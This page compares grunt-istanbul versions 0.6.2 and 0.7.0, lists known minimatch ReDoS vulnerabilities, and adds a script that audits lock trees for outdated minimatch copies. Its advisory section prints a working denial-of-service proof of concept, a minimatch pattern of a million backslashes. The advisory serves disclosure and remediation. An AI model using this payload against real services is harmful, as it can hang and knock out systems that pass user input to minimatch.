Grunt-istanbul is a Grunt plugin designed for JavaScript code coverage analysis, streamlining the integration of Istanbul, a popular JavaScript code coverage tool, into Grunt-based workflows. Comparing version 0.7.0 with the previous stable version 0.6.2 reveals subtle but potentially impactful changes for developers. Both versions share core dependencies like chalk, istanbul, and nue, ensuring consistent functionality for tasks such as report styling and asynchronous execution. Similarly, development dependencies including testing frameworks (grunt-contrib-nodeunit), linting tools (grunt-contrib-jshint), and utility libraries like mkdirp and rimraf remain consistent, suggesting a focus on maintaining existing codebase quality.
The key difference lies in the peerDependencies. Version 0.6.2 declares grunt: "~0.4.5" as a peer dependency, while version 0.7.0 relaxes this to grunt: ">=0.4.0". Seemingly minor, this broadening of the accepted Grunt range is a compatibility change: developers on older Grunt releases (0.4.0 to 0.4.4), who could not use grunt-istanbul 0.6.2, can use version 0.7.0. Note that ">=0.4.0" has no upper bound, so it also accepts any later Grunt major version that the plugin may not have been tested against. This reduces friction for teams whose projects pin different Grunt versions, making Grunt-istanbul usable without mandating an immediate Grunt upgrade, and so simplifies adding code coverage to Grunt-driven build processes. The later release date of 0.7.0 also means it carries the more recent bug fixes and enhancements.
Known vulnerabilities affecting version 0.7.0 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require("minimatch");
// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};
// pathological pattern from the advisory: "[!" followed by a very long run of backslashes
var exploit = "[!" + genstr(1000000, "\\") + "A";
// minimatch exploit: on an affected minimatch version this call does not return in reasonable time
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
Update minimatch to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.
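As an added example (not code from the page or from grunt-istanbul), this is the check a maintainer would run against an install to find nested minimatch copies still below a fixed version: 3.0.2 for the first advisory above; the braceExpand advisory's fixed version is not given here, so the floor is simply a parameter. In the sample lock data, every package name and version other than grunt-istanbul 0.7.0 is a constructed placeholder, not the plugin's real dependency tree.

```javascript
// Added example: walk a package-lock-style dependency tree and report every
// installed copy of a package whose version is below the advisory's fixed
// version. Lock data at the bottom is constructed for the demo.

// Parse "MAJOR.MINOR.PATCH" (optional leading "v"; any trailing tag is ignored).
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new TypeError(`not a semver version: ${v}`);
  return m.slice(1, 4).map(Number);
}

// Numeric comparison so that 3.0.10 sorts after 3.0.2; returns -1, 0 or 1.
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

// Collect every copy of `name` in a nested { dependencies: { pkg: { version,
// dependencies } } } tree, recording the path that pulled it in.
function findInstalled(tree, name, trail = [], out = []) {
  const deps = (tree && tree.dependencies) || {};
  for (const [pkg, info] of Object.entries(deps)) {
    const here = trail.concat(pkg);
    if (pkg === name) out.push({ path: here.join(' > '), version: info.version });
    findInstalled(info, name, here, out);
  }
  return out;
}

// Copies of `name` whose version is below `fixedVersion`, i.e. still affected.
function findVulnerable(tree, name, fixedVersion) {
  return findInstalled(tree, name).filter((h) => compareVersions(h.version, fixedVersion) < 0);
}

// Constructed lock data: 'example-dep' and 'other-tool' and their versions are
// illustrative placeholders, not grunt-istanbul's real dependency tree.
const SAMPLE_LOCK = {
  dependencies: {
    'grunt-istanbul': {
      version: '0.7.0',
      dependencies: { 'example-dep': { version: '1.0.0', dependencies: { minimatch: { version: '2.0.10' } } } },
    },
    'other-tool': { version: '1.2.3', dependencies: { minimatch: { version: '3.0.2' } } },
  },
};

console.log(findVulnerable(SAMPLE_LOCK, 'minimatch', '3.0.2'));
```

Only the copy nested under grunt-istanbul is reported; the 3.0.2 copy under other-tool is at the fixed version and passes.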